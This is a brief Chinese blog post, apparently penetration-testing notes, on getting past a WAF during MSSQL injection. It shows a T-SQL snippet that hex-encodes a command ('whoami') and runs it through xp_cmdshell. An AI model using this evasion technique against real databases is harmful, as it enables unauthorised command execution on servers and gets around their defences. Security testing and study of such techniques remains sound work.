所有的授权实战入侵网站已添加“如何入侵”标签,在侧边栏的归档中选择“如何入侵”即可查看所有文章

MENU

MSSQL注入命令绕过

October 3, 2022 • Read: 255 • 常山阅读设置

MSSQL注入命令绕过

在mssql注入中,SQLmap会使用16进制进行xp_cmdshell命令执行,使用该方法可以绕过一定的WAF防护。

在内网横向时,SQLmap无法同时使用-d--proxy命令,所以仍需手动命令执行,如果mssql机器上存在WAF等安全设备,即可使用该方法绕过,以执行命令.

DECLARE @abc VARCHAR(8000);
/* 0x77686f616d69的16进制解码为whoami */
SET @abc=0x77686f616d69;
exec master..xp_cmdshell @abc;
Archives QR Code Tip
QR Code for this page
Tipping QR Code